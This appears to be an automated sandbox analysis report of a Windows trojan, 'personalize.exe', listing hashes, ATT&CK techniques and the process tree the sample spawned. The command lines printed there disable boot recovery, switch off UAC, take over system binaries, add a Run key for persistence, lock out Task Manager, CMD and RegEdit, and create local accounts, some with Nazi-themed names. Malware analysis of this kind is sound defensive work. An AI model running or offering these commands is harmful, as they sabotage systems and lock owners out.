8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7

Analysis

max time kernel
63s
max time network
66s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
30-06-2024 13:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

personalize.exe
Size

832KB
MD5

3780f9b91fde991c40386927dae15096
SHA1

0ac6c6284751dd0bac7d58714f899c16da63256a
SHA256

8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
SHA512

f5fcba684cb2b4d8c6000649140e693d1589e7f42cccbd9592d82d4c3c2c2cb635f3c851bdb2c95aa0bb8ed7872c9b6a55d7dec4734ca2da429b257e41246e2c
SSDEEP

24576:StA4KdTxn+SoA/baP35yfbSLF2aYVlHvAclDJDb:jdTlzV+P35yfsFI3vAclxb

Score

10^/10

defense_evasion discovery evasion exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exe

pid process

2316 bcdedit.exe
Disables RegEdit via registry modification 1 IoCs
evasion

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe
Disables Task Manager via registry modification
evasion
Possible privilege escalation attempt 6 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5040 takeown.exe
4004 icacls.exe
3412 takeown.exe
4912 icacls.exe
3032 takeown.exe
3284 icacls.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4584 attrib.exe
1224 attrib.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5040 takeown.exe
4004 icacls.exe
3412 takeown.exe
4912 icacls.exe
3032 takeown.exe
3284 icacls.exe
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" reg.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2316	bcdedit.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

pid	process
5040	takeown.exe
4004	icacls.exe
3412	takeown.exe
4912	icacls.exe
3032	takeown.exe
3284	icacls.exe

pid	process
4584	attrib.exe
1224	attrib.exe

pid	process
5040	takeown.exe
4004	icacls.exe
3412	takeown.exe
4912	icacls.exe
3032	takeown.exe
3284	icacls.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe"	reg.exe

Drops file in System32 directory 13 IoCs

Processes:

cmd.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\screenmelt.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	attrib.exe
File opened for modification	C:\Windows\System32\mmc.exe	cmd.exe
File opened for modification	C:\Windows\System32\taskmgr.exe	cmd.exe
File opened for modification	C:\Windows\System32\msiexec.exe	cmd.exe
File created	C:\Windows\System32\colorcmd.exe	cmd.exe
File created	C:\Windows\System32\screenmelt.exe	cmd.exe
File created	C:\Windows\System32\mbr.exe	cmd.exe
File opened for modification	C:\Windows\System32\colorcmd.exe	cmd.exe
File opened for modification	C:\Windows\system32\winnt64.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	cmd.exe
File created	C:\Windows\system32\winnt64.exe	cmd.exe
File opened for modification	C:\Windows\System32\winnt64.exe	attrib.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs
ransomware

Defacement
T1491

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" reg.exe
Drops file in Windows directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\Web\winntcus64.png cmd.exe
File created C:\Windows\Web\winntcus64.png cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1748 timeout.exe
224 timeout.exe
1872 timeout.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png"	reg.exe

description	ioc	process
File opened for modification	C:\Windows\Web\winntcus64.png	cmd.exe
File created	C:\Windows\Web\winntcus64.png	cmd.exe

pid	process
1748	timeout.exe
224	timeout.exe
1872	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "70"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exe

pid process

4876 msedge.exe
4876 msedge.exe
3676 msedge.exe
3676 msedge.exe
2092 msedge.exe
2092 msedge.exe
4864 identity_helper.exe
4864 identity_helper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

msedge.exe

pid process

3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe

pid	process
4876	msedge.exe
4876	msedge.exe
3676	msedge.exe
3676	msedge.exe
2092	msedge.exe
2092	msedge.exe
4864	identity_helper.exe
4864	identity_helper.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

takeown.exetakeown.exetakeown.exeshutdown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	5040	takeown.exe
Token: SeTakeOwnershipPrivilege	3412	takeown.exe
Token: SeTakeOwnershipPrivilege	3032	takeown.exe
Token: SeShutdownPrivilege	3784	shutdown.exe
Token: SeRemoteShutdownPrivilege	3784	shutdown.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid process

3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
3676 msedge.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

PickerHost.exeLogonUI.exe

pid process

4928 PickerHost.exe
2820 LogonUI.exe

pid	process
4928	PickerHost.exe
2820	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

personalize.execmd.exenet.exenet.exe

description	pid	process	target process
PID 4476 wrote to memory of 2800	4476	personalize.exe	cmd.exe
PID 4476 wrote to memory of 2800	4476	personalize.exe	cmd.exe
PID 2800 wrote to memory of 856	2800	cmd.exe	choice.exe
PID 2800 wrote to memory of 856	2800	cmd.exe	choice.exe
PID 2800 wrote to memory of 892	2800	cmd.exe	choice.exe
PID 2800 wrote to memory of 892	2800	cmd.exe	choice.exe
PID 2800 wrote to memory of 2316	2800	cmd.exe	bcdedit.exe
PID 2800 wrote to memory of 2316	2800	cmd.exe	bcdedit.exe
PID 2800 wrote to memory of 780	2800	cmd.exe	cmd.exe
PID 2800 wrote to memory of 780	2800	cmd.exe	cmd.exe
PID 2800 wrote to memory of 1464	2800	cmd.exe	cmd.exe
PID 2800 wrote to memory of 1464	2800	cmd.exe	cmd.exe
PID 2800 wrote to memory of 4584	2800	cmd.exe	attrib.exe
PID 2800 wrote to memory of 4584	2800	cmd.exe	attrib.exe
PID 2800 wrote to memory of 5040	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 5040	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 4004	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 4004	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 3412	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 3412	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 4912	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 4912	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 3032	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 3032	2800	cmd.exe	takeown.exe
PID 2800 wrote to memory of 3284	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 3284	2800	cmd.exe	icacls.exe
PID 2800 wrote to memory of 4108	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4108	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 2956	2800	cmd.exe	rundll32.exe
PID 2800 wrote to memory of 2956	2800	cmd.exe	rundll32.exe
PID 2800 wrote to memory of 1768	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 1768	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 1224	2800	cmd.exe	attrib.exe
PID 2800 wrote to memory of 1224	2800	cmd.exe	attrib.exe
PID 2800 wrote to memory of 4924	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4924	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 3052	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 3052	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 3580	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 3580	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 2828	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 2828	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4580	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4580	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4064	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4064	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 860	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 860	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 968	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 968	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 948	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 948	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4520	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4520	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 1352	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 1352	2800	cmd.exe	reg.exe
PID 2800 wrote to memory of 4940	2800	cmd.exe	net.exe
PID 2800 wrote to memory of 4940	2800	cmd.exe	net.exe
PID 4940 wrote to memory of 4832	4940	net.exe	net1.exe
PID 4940 wrote to memory of 4832	4940	net.exe	net1.exe
PID 2800 wrote to memory of 2396	2800	cmd.exe	net.exe
PID 2800 wrote to memory of 2396	2800	cmd.exe	net.exe
PID 2396 wrote to memory of 2288	2396	net.exe	net1.exe
PID 2396 wrote to memory of 2288	2396	net.exe	net1.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4584 attrib.exe
1224 attrib.exe

pid	process
4584	attrib.exe
1224	attrib.exe

C:\Users\Admin\AppData\Local\Temp\personalize.exe
"C:\Users\Admin\AppData\Local\Temp\personalize.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2800

C:\Windows\system32\choice.exe
choice /c yn /n /m ""
3⤵
PID:856

C:\Windows\system32\choice.exe
choice /c yn /n /m ""
3⤵
PID:892

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:2316

C:\Windows\system32\cmd.exe
cmd.exe
3⤵
PID:780

C:\Windows\system32\cmd.exe
cmd.exe
3⤵
PID:1464

C:\Windows\system32\attrib.exe
attrib +s +h C:\Windows\System32\mbr.exe
3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4584

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\taskmgr.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\taskmgr.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4004

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\mmc.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3412

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\mmc.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4912

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\msiexec.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\msiexec.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3284

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f
3⤵
- Sets desktop wallpaper using registry
PID:4108

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
3⤵
PID:2956

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
PID:1768

C:\Windows\system32\attrib.exe
attrib +s +h C:\Windows\System32\winnt64.exe
3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:1224

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"
3⤵
- Adds Run key to start application
PID:4924

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:3052

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
3⤵
PID:3580

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
3⤵
PID:2828

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
3⤵
PID:4580

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:4064

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:860

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f
3⤵
PID:968

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
3⤵
PID:948

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f
3⤵
PID:4520

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
3⤵
PID:1352

C:\Windows\system32\net.exe
net user /add NTCUS ntcus123
3⤵
- Suspicious use of WriteProcessMemory
PID:4940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTCUS ntcus123
4⤵
PID:4832

C:\Windows\system32\net.exe
net user /add NTUSER ntcus124
3⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTUSER ntcus124
4⤵
PID:2288

C:\Windows\system32\net.exe
net user /add NTDAT ntpersonalize
3⤵
PID:1396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTDAT ntpersonalize
4⤵
PID:324

C:\Windows\system32\net.exe
net user /add DC discord
3⤵
PID:4320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add DC discord
4⤵
PID:4332

C:\Windows\system32\net.exe
net user /add cfs belgium
3⤵
PID:3748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add cfs belgium
4⤵
PID:2964

C:\Windows\system32\net.exe
net user /add leopoldII belgium
3⤵
PID:1204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add leopoldII belgium
4⤵
PID:2552

C:\Windows\system32\net.exe
net user /add SCHJIEAB rykn
3⤵
PID:2656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add SCHJIEAB rykn
4⤵
PID:4660

C:\Windows\system32\net.exe
net user /add IZWYOKWYIEN rykn
3⤵
PID:4116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn
4⤵
PID:4572

C:\Windows\system32\net.exe
net user /add asap asap
3⤵
PID:1568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add asap asap
4⤵
PID:3120

C:\Windows\system32\net.exe
net user /add REICHTANGLE ig1
3⤵
PID:4840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add REICHTANGLE ig1
4⤵
PID:2960

C:\Windows\system32\net.exe
net user /add SIEGHEIL hitler
3⤵
PID:976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add SIEGHEIL hitler
4⤵
PID:2608

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
3⤵
PID:4224

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f
3⤵
PID:3608

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
3⤵
- Disables RegEdit via registry modification
PID:1416

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=HAHAHAHAHAHA
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
4⤵
PID:1944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2
4⤵
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
4⤵
PID:3596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
4⤵
PID:2376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
4⤵
PID:648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
4⤵
PID:1352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
4⤵
PID:2656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
4⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
4⤵
PID:1556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
